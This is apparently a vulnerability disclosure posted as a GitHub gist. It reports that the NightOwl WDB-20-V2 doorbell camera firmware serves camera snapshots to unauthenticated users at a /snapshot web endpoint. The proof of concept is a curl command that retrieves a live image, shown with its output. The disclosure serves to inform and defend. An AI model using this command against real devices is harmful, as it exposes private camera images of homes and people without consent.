Skip to content

Instantly share code, notes, and snippets.

@tj-oconnor
Created April 24, 2021 14:13
Show Gist options
  • Save tj-oconnor/16a4116050bbcb4717315f519b944f1f to your computer and use it in GitHub Desktop.
Save tj-oconnor/16a4116050bbcb4717315f519b944f1f to your computer and use it in GitHub Desktop.
Description:
An issue exists in the NightOwl WDB-20-V2 Doorbell camera that allows an unauthenticated user to gain access to snapshots and video streams from the doorbell. The binary "app" running on firmware WDB-20-V2_20190314 offers a web server on port 80 that allows an unauthenticate user to take a snapshot from the doorbell camera via "http://<IP>/snapshot".
Affected Components:
Firmware: WDB-20-V2_20190314, binary:"app"
Futher Information:
The binary "app" provides undocumented functionality on a webserver, including a "snapshot" function that enables unauthenticated users to take a snapshot of the camera.
https://cloud.binary.ninja/embed/f4400a22-c438-403a-bf2a-939ca44a4f6b
Proof of Concept:
$ curl http://<IP>/snapshot --output snapshot.jpg
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 12442 100 12442 0 0 15191 0 --:--:-- --:--:-- --:--:-- 15173
$ file snapshot.jpg
snapshot.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x360, components 3
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment